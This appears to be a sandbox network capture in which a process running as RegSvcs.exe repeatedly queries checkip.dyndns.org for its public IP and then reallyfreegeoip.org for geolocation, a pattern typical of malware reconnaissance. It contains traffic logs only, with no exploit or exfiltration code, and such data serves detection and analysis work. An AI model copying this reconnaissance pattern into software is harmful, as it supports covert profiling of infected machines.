Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:23:55.277374029 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:23:55.959275961 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:23:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 20:23:55.963427067 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:23:56.173664093 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:23:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 20:23:57.102193117 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:23:57.312096119 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:23:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	132.226.247.73	80	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:23:57.992367029 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:23:58.685033083 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:23:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	132.226.247.73	80	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:23:59.319762945 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:23:59.993010044 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:23:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	132.226.247.73	80	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:00.168922901 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:00.842230082 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 20:24:00.846836090 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:24:01.076775074 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 20:24:01.829404116 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:24:02.045994043 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	132.226.247.73	80	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:00.613106012 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:01.318676949 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	132.226.247.73	80	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:01.944890976 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:02.628397942 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49752	132.226.247.73	80	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:02.654784918 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:24:03.354253054 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	132.226.247.73	80	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:03.233732939 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:03.920108080 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	132.226.247.73	80	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:04.000997066 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:04.723802090 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49757	132.226.247.73	80	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:04.575346947 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:05.276160002 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49760	132.226.247.73	80	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:05.361500978 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:06.092055082 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49762	132.226.247.73	80	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:06.770608902 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:07.470913887 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	132.226.247.73	80	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:08.100476980 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:08.774764061 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49767	132.226.247.73	80	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:24:09.439560890 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:24:10.156790972 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	188.114.96.3	443	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:23:56 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:23:57 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:23:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160626 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHK1fwZbH6dRjkBoCzrtoX4RmpKZ63vfk5spvPdD7BZhbG3SsWVsGAa6niPvUjKRtqQuNEwT2%2FL67Y%2BK3gniLCpxMugqKLn9m%2BtUvBStlLGgL2zKNK4DUOwdmwUyM0Vm8DaLAV%2Bp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd20616c395e62-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1720&rtt_var=667&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1613259&cwnd=139&unsent_bytes=0&cid=b9faf0a0f818b2ae&ts=353&x=0"
2025-01-02 19:23:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	188.114.96.3	443	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:23:57 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:23:57 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:23:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160627 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WrndTQb1TOLCoHImHw3Sl6MlY3EmElUcwT0iXc%2FmA5CUjOYpVB88oQnqIhlyS%2FoP5%2B6zglyrv0%2BkVOT1j7GRb%2FQpJX40cGJXjKG%2Bra1EMo3n6gRjd2yiecNoJdMMIAQveP5ZUGdy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd2066aa91de97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1663&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1755862&cwnd=236&unsent_bytes=0&cid=8707c1cba6d13a0d&ts=142&x=0"
2025-01-02 19:23:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	188.114.96.3	443	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:23:59 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:23:59 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:23:59 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160628 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYQAd8wLdVyueOJwejTvu2UyWKR9ZDu1jUgnsPj0U3NHyFtmRukuReYKHqhN%2FtJnrvvhivQPZLXqZJmCl1y0f46DZm%2FGejBAvLULPDE%2FwSS0CLzMZ0IeQM6pAhsOsp2mwOA%2BYsEt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd206f4f100f53-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1503&rtt_var=570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1908496&cwnd=193&unsent_bytes=0&cid=c950f5ee5df47dc3&ts=144&x=0"
